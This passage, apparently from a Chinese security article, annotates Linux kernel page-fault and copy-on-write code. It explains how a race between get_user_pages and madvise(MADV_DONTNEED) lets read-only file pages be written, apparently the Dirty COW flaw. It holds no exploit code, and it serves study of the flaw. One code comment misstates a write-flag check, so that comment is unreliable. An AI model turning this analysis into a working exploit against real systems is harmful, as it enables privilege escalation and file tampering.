				spin_unlock(ptl);
				*page_mask = HPAGE_PMD_NR - 1;
				return page;
			}
		} else
			spin_unlock(ptl);
	}
	return follow_page_pte(vma, address, pmd, flags);
}

first page fault

当第一次调用follow_page_mask返回的是NULL，还未存在相应的物理页，即缺页，触发页错误的机制去申请；

static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma,
		unsigned long address, unsigned int *flags, int *nonblocking)

int handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		    unsigned long address, unsigned int flags)
			
static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
			     unsigned long address, unsigned int flags)

static int handle_pte_fault(struct mm_struct *mm,
		     struct vm_area_struct *vma, unsigned long address,
		     pte_t *pte, pmd_t *pmd, unsigned int flags)
		     
/*
 * These routines also need to handle stuff like marking pages dirty
 * and/or accessed for architectures that don't do it in hardware (most
 * RISC architectures).  The early dirtying is also good on the i386.
 *
 * There is also a hook called "update_mmu_cache()" that architectures
 * with external mmu caches can use to update those (ie the Sparc or
 * PowerPC hashed page tables that act as extended TLBs).
 *
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults), and pte mapped but not yet locked.
 * We return with pte unmapped and unlocked.
 *
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int handle_pte_fault(struct mm_struct *mm,
		     struct vm_area_struct *vma, unsigned long address,
		     pte_t *pte, pmd_t *pmd, unsigned int flags)
{
	pte_t entry;
	spinlock_t *ptl;

	/*
	 * some architectures can have larger ptes than wordsize,
	 * e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and CONFIG_32BIT=y,
	 * so READ_ONCE or ACCESS_ONCE cannot guarantee atomic accesses.
	 * The code below just needs a consistent view for the ifs and
	 * we later double check anyway with the ptl lock held. So here
	 * a barrier will do.
	 */
	entry = *pte;
	barrier();
	if (!pte_present(entry)) {     // 判断pte页表项是否为空，即是否缺页
		if (pte_none(entry)) {     // 如果缺页
			if (vma_is_anonymous(vma))   // 如果是一个匿名页，即没有堆、栈、数据段等，不以文件形式存在
				return do_anonymous_page(mm, vma, address,  // 则创建一个匿名页
							 pte, pmd, flags);
			else
				return do_fault(mm, vma, address, pte, pmd,  // 如果不是匿名页，调用do_fault()
						flags, entry);
		}
		return do_swap_page(mm, vma, address,   //替换页
					pte, pmd, flags, entry);
	}

	if (pte_protnone(entry))
		return do_numa_page(mm, vma, address, entry, pte, pmd);

	ptl = pte_lockptr(mm, pmd);
	spin_lock(ptl);
	if (unlikely(!pte_same(*pte, entry)))
		goto unlock;
	if (flags & FAULT_FLAG_WRITE) {      // 如果页表项存在并且存在写操作
		if (!pte_write(entry))          // 如果页表项不可写
			return do_wp_page(mm, vma, address,   // 调用do_wp_page()
					pte, pmd, ptl, entry);
		entry = pte_mkdirty(entry);
	}
	entry = pte_mkyoung(entry);
	if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
		update_mmu_cache(vma, address, pte);
	} else {
		/*
		 * This is needed only for protection faults but the arch code
		 * is not yet telling us if this is a protection fault or not.
		 * This still avoids useless tlb flushes for .text page faults
		 * with threads.
		 */
		if (flags & FAULT_FLAG_WRITE)
			flush_tlb_fix_spurious_fault(vma, address);
	}
unlock:
	pte_unmap_unlock(pte, ptl);
	return 0;
}

下面来看调用do_fault所做的处理；

/*
 * We enter with non-exclusive mmap_sem (to exclude vma changes,
 * but allow concurrent faults).
 * The mmap_sem may have been released depending on flags and our
 * return value.  See filemap_fault() and __lock_page_or_retry().
 */
static int do_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pte_t *page_table, pmd_t *pmd,
		unsigned int flags, pte_t orig_pte)
{
	pgoff_t pgoff = (((address & PAGE_MASK)
			- vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff;

	pte_unmap(page_table);
	/* The VMA was not fully populated on mmap() or missing VM_DONTEXPAND */
	if (!vma->vm_ops->fault)
		return VM_FAULT_SIGBUS;
	if (!(flags & FAULT_FLAG_WRITE))     // 如果有写操作
		return do_read_fault(mm, vma, address, pmd, pgoff, flags,   // 调用do_read_fault处理，不执行COW，直接映射文件
				orig_pte);
	if (!(vma->vm_flags & VM_SHARED))   // 如果页不是共享页，即COW的私有映射，而且目标内存有可写权限
		return do_cow_fault(mm, vma, address, pmd, pgoff, flags,    // 调用do_cow_fault
				orig_pte);
	return do_shared_fault(mm, vma, address, pmd, pgoff, flags, orig_pte);
}

再跟踪看看do_cow_fault；

static int do_cow_fault(struct mm_struct *mm, struct vm_area_struct *vma,
		unsigned long address, pmd_t *pmd,
		pgoff_t pgoff, unsigned int flags, pte_t orig_pte)
{
	struct page *fault_page, *new_page;
	struct mem_cgroup *memcg;
	spinlock_t *ptl;
	pte_t *pte;
	int ret;
    // ...
    
	new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, address);
	if (!new_page)
		return VM_FAULT_OOM;
    // ...
	ret = __do_fault(vma, address, pgoff, flags, new_page, &fault_page);
	if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
		goto uncharge_out;

	if (fault_page)
		copy_user_highpage(new_page, fault_page, address, vma);
	__SetPageUptodate(new_page);
    // ...
	do_set_pte(vma, address, new_page, pte, true, true);      // 这里调用do_set_pte，设置pte表项
	mem_cgroup_commit_charge(new_page, memcg, false);
	lru_cache_add_active_or_unevictable(new_page, vma);
	pte_unmap_unlock(pte, ptl);
	if (fault_page) {
		unlock_page(fault_page);
		page_cache_release(fault_page);
	} else {
		/*
		 * The fault handler has no page to lock, so it holds
		 * i_mmap_lock for read to protect against truncate.
		 */
		i_mmap_unlock_read(vma->vm_file->f_mapping);
	}
	return ret;
    // ...

跟踪do_set_pte；

void do_set_pte(struct vm_area_struct *vma, unsigned long address,
		struct page *page, pte_t *pte, bool write, bool anon)
{
	pte_t entry;

	flush_icache_page(vma, page);
	entry = mk_pte(page, vma->vm_page_prot);
	if (write)           // 如果write_flag为true
		entry = maybe_mkwrite(pte_mkdirty(entry), vma);        // 做ptewrite当且仅当vma的vm_flags中的VM_WRITE位为1，如果执行到这里，pte_mkdirty()会将对应页标记为脏
    // ...
}

    /*
     static inline pte_t maybe_mkwrite(pte_t pte, struct vm_area_struct *vma)
    {
        if (likely(vma->vm_flags & VM_WRITE))       
            pte = pte_mkwrite(pte);                   // 这里调用了pte_mkwrite()
        return pte;
    }
     */

    /*
    static inline pte_t pte_mkdirty(pte_t pte)
    {
        return pte_set_flags(pte, _PAGE_DIRTY | _PAGE_SOFT_DIRTY);         // 将页面标脏
    }
    */

之前的漏洞是在get_user_pages函数中，这个函数能够获取用户进程调用的虚拟地址之后的物理地址，调用者需要声明它想要执行的具体操作(例如写/锁等操作)，所以内存管理可以准备相对应的内存页。具体来说，也就是当进行写入私有映射的内存页时，会经过一个COW(写时拷贝)的过程，即复制只读页生成一个带有写权限的新页，原始页可能是私有保护不可写的，但它可以被其他进程映射使用。用户也可以在COW后的新页中修改内容之后重新写入到磁盘中。

整个while循环的目的是获取请求页队列中的每个页，反复操作直到满足构建所有内存映射的需求，这也是retry标签的作用；

follow_page_mask读取页表来获取指定地址的物理页(同时通过PTE允许)或获取不满足需求的请求内容；

在follow_page_mask操作中会获取PTE的spinlock，用来保护试图获取内容的物理页不会被释放掉；

faultin_page函数申请内存管理的权限(同样有PTE的spinlock保护)来处理目标地址中的错误信息；

在成功调用faultin_page后，锁会自动释放，从而保证follow_page_mask能够成功进行下一次尝试，以下是涉及到的代码。

一般情况下在COW操作后移除FOLL_WRITE标志是没有问题的，因为这时VMA指向的页是刚经过写时拷贝复制的新页，我们是有写权限的，后续不进行写权限检查并不会有问题。但是，考虑这样一种情况，如果在这个时候用户通过madvise(MADV_DONTNEED)将刚刚申请的新页丢弃掉，那这时本来在faultin_page后应该成功的follow_page_mask会再次失败，又会进入faultin_page的逻辑，但是这个时候已经没有FOLL_WRITE的权限检查了，只会检查可读性。这时内核就会将只读页面直接映射到我们的进程空间里，这时VMA指向的页不再是通过COW获得的页，而是文件的原始页，这就获得了任意写文件的能力。

缺页中断处理

硬件陷入内核，在堆栈中保存程序计数器。大多数机器将当前指令的各种状态信息保存在特殊的CPU寄存器中。
启动一个汇编代码例程保存通用寄存器和其他易失的信息，以免被操作系统破坏。这个例程将操作系统作为一个函数来调用。
当操作系统发现一个缺页中断时，尝试发现需要哪个虚拟页面。通常一个硬件寄存器包含了这一信息，如果没有的话，操作系统必须检索程序计数器，取出这条指令，用软件分析这条指令，看看它在缺页中断时正在做什么。
一旦知道了发生缺页中断的虚拟地址，操作系统检查这个地址是否有效，并检查存取与保护是否一致。如果不一致，向进程发出一个信号或杀掉该进程。如果地址有效且没有保护错误发生，系统则检查是否有空闲页框。如果没有空闲页框，执行页面置换算法寻找一个页面来淘汰。
如果选择的页框“脏”了，安排该页写回磁盘，并发生一次上下文切换，挂起产生缺页中断的进程，让其他进程运行直至磁盘传输结束。无论如何，该页框被标记为忙，以免因为其他原因而被其他进程占用。
一旦页框“干净”后（无论是立刻还是在写回磁盘后），操作系统查找所需页面在磁盘上的地址，通过磁盘操作将其装入。该页面被装入后，产生缺页中断的进程仍然被挂起，并且如果有其他可运行的用户进程，则选择另一个用户进程运行。
当磁盘中断发生时，表明该页已经被装入，页表已经更新可以反映它的位置，页框也被标记为正常状态。
恢复发生缺页中断指令以前的状态，程序计数器重新指向这条指令。
调度引发缺页中断的进程，操作系统返回调用它的汇编语言例程。
该例程恢复寄存器和其他状态信息，返回到用户空间继续执行，就好像缺页中断没有发生过一样。

get_user_pages{//这是一个Wrap
    ...
    return __get_user_pages() //获取用户内存的核心函数
    ...
}
__get_user_pages(vma,...,int flag,...){
    ...
    retry:
        ...
        page = follow_page_mask(...,flag,...); //获取页表项
       if (!page) {
            int ret;
            ret = faultin_page(vma,...); //获取失败时会调用这个函数
            switch (ret) {
               case 0://如果返回为0，就重试，这是一个循环
               goto retry;
            ...

        }
}
follow_page_mask(...,flag,...){
    //这个函数会走 页一集目录->二级目录->页表项 的传统页式内存的管理流程
    ...
    return follow_page_pte(...,flag,...); //走到了流程的第三步：寻找页表项
    ...
}
follow_page_pte(...,flag,...){
    ...
    //如果获取页表项时要求页表项所指向的内存映射具有写权限，但是页表项所指向的内存并没有写权限。则会返回空
    if ((flags & FOLL_WRITE) && !pte_write(pte)) { 
       pte_unmap_unlock(ptep, ptl);
       return NULL;
    }

    //获取页表项的请求不要求内存映射具有写权限的话会返回页表项
    return pages;
    ...
}
faultin_page(vma,){
    ...
    //处理page fault
    ret = handle_mm_fault();
    //这个if对应了上一个函数的注释，如果是因为映射没有写权限导致的获取页表项失败，会去掉flags中的FOLL_WRITE标记，从而使的获取页表项不再要求内存映射具有写的权限。
    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
       *flags &= ~FOLL_WRITE;
    ...
    return 0；
}
handle_mm_fault(){
    __handle_mm_fault()
}
__handle_mm_fault(){
    handle_pte_fault()
}
handle_pte_fault(){
    //页表为空，说明缺页。调用do_fault调页
    if (!fe->pte) {
          ... 
         return do_fault(fe);
   }
   //页表不为空，但是要写入的页没有写权限，这时可能需要COW
   if (fe->flags & FAULT_FLAG_WRITE) {
        if (!pte_write(entry))
            return do_wp_page(fe, entry);
        ...
    }
}
do_fault(fe){
    //如果不要求目标内存具有写权限时导致缺页，内核不会执行COW操作产生副本
    if (!(fe->flags & FAULT_FLAG_WRITE))
        return do_read_fault(fe, pgoff);
    //如果要求目标内存具有写权限时导致缺页，目标内存映射是一个VM_PRIVATE的映射，内核会执行COW操作产生副本
    if (!(vma->vm_flags & VM_SHARED))
        return do_cow_fault(fe, pgoff);
}
do_cow_fault(fe,pgoff){
    //执行COW， 并更新页表为COW后的页表。
    new_page = alloc_page_vma(GFP_HIGHUSER_MOVABLE, vma, fe->address);
    ...
    // __do_fault会将内存
    ret = __do_fault(fe, pgoff, new_page, &fault_page, &fault_entry);
    ... 
        copy_user_highpage(new_page, fault_page, fe->address, vma);
    ret |= alloc_set_pte(fe, memcg, new_page);
    ...
    return ret
}
do_read_fault(fe,pgoff){
    ...
    //不执行COW，直接映射文件。
    __do_fault(fe, pgoff, NULL, &fault_page, NULL);
    ...
    ret |= alloc_set_pte(fe, NULL, fault_page);
    ...
    ret
}
alloc_set_pte(fe,...){
    bool write = fe->flags & FAULT_FLAG_WRITE;
    //如果执行了COW，设置页表时会将页面标记为脏，但是不会标记为可写。
    if (write)
        entry = maybe_mkwrite(pte_mkdirty(entry), vma);
}
do_wp_page(fe,entry){
     ....
     //内核通过检查，发现COW操作已经在缺页处理时完成了，所以不再进行COW，而是直接利用之前COW得到的页表项
     return wp_page_reuse(fe, orig_pte, old_page, 0, 0);
}
wp_page_reuse(){
     将页面标记为脏，但是不会标记为可写。
     entry = maybe_mkwrite(pte_mkdirty(entry), vma);
}
maybe_mkwrite(){
    //这就是maybe_mkwrite不会标记页为可写的原因，因为这个页为只读页。所以不满足if的条件
    if (likely(vma->vm_flags & VM_WRITE))
        pte = pte_mkwrite(pte);
    return pte;
}

anquanke